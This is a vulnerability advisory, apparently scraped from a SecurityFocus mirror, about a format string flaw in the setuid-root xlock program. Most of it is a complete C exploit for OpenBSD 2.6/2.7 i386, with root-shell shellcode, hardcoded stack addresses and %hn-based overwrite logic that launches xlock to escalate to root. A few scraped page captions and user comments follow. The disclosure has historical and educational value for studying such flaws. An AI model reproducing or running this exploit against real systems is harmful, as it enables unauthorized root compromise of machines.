source: http://www.securityfocus.com/bid/1585/info
A vulnerability exists in versions of the xlockmore program, originally written by David Bagley. It is believed to affect all versions of xlock derived from xlockmore. This includes the xlock shipped with a number of popular operating systems.
Xlock is installed setuid root. Normally, the -d option to xlock is used to set the display it will be locking. This value is normally of the format hostname:portoffset, ie. x.host.com:0, to connect to the X server runnign on x.host.com, listening on port 6000. By supplying format strings in this value, it is possible to cause xlock to output numeric values. Using other format strings, it may be possible for an attacker to overwrite values on the stack. This may make it possible to execute arbitrary code with root privileges.
While several vulnerable operating systems have been listed, this list is by no means complete.
It has been reported that this vulnerability exists only in systems with versions of xlock that use the error() call. (it is also unverified whether the bug is in libc or xlib).
/*
OpenBSD 2.6/2.7 xlock exploit by noir
[email protected]
tested only on OpenBSD/i386 2.6
thanks:
[email protected] for support!
greets: caddis <[email protected]> orginal chpass exploit
bind, CronoS, dustdvl, ppl from defcon7, gsu-linux staff
TESO, ADM, Lam3rz, SSG
*/
#include <stdio.h>
char bsd_shellcode[] =
"x31xc0x50x50xb0x17xcdx80"// setuid(0)
"x31xc0x50x50xb0xb5xcdx80"//setgid(0)
"xebx16x5ex31xc0x8dx0ex89"
"x4ex08x89x46x0cx8dx4ex08"
"x50x51x56x50xb0x3bxcdx80"
"xe8xe5xffxffxff/bin/sh";
struct platform {
char *name;
unsigned short count;
unsigned long dest_addr;
unsigned long shell_addr;
char *shellcode;
};
struct platform targets[3] =
{
{ "OpenBSD 2.6 i386 ", 246, 0xdfbfd4a0, 0xdfbfdde0, bsd_shellcode },
{ "OpenBSD 2.7 i386 ", 246, 0xaabbccdd, 0xaabbccdd, bsd_shellcode },
{ NULL, 0, 0, 0, NULL }
};
char jmpcode[129];
char fmt_string[2000];
char *args[] = { "xlock", "-display", fmt_string, NULL };
char *envs[] = { jmpcode, NULL };
int main(int argc, char *argv[])
{
char *p;
int x, len = 0;
struct platform *target;
unsigned short low, high;
unsigned long shell_addr[2], dest_addr[2];
target = &targets[0];
memset(jmpcode, 0x90, sizeof(jmpcode));
strcpy(jmpcode + sizeof(jmpcode) - strlen(target->shellcode), target->shellcode);
shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16;
shell_addr[1] = target->shell_addr & 0xffff;
memset(fmt_string, 0x00, sizeof(fmt_string));
for (x = 17; x < target->count; x++) {
strcat(fmt_string, "%8x");
len += 8;
}
if (shell_addr[1] > shell_addr[0]) {
dest_addr[0] = target->dest_addr+2;
dest_addr[1] = target->dest_addr;
low = shell_addr[0] - len;
high = shell_addr[1] - low - len;
} else {
dest_addr[0] = target->dest_addr;
dest_addr[1] = target->dest_addr+2;
low = shell_addr[1] - len;
high = shell_addr[0] - low - len;
}
*(long *)&fmt_string[0] = 0x41;
*(long *)&fmt_string[1] = 0x11111111;
*(long *)&fmt_string[5] = dest_addr[0];
*(long *)&fmt_string[9] = 0x11111111;
*(long *)&fmt_string[13] = dest_addr[1];
p = fmt_string + strlen(fmt_string);
sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high);
execve("/usr/X11R6/bin/xlock", args, envs);
perror("execve");
}
![图片[1]-xlockmore和xlockf格式化字符串漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-xlockmore和xlockf格式化字符串漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666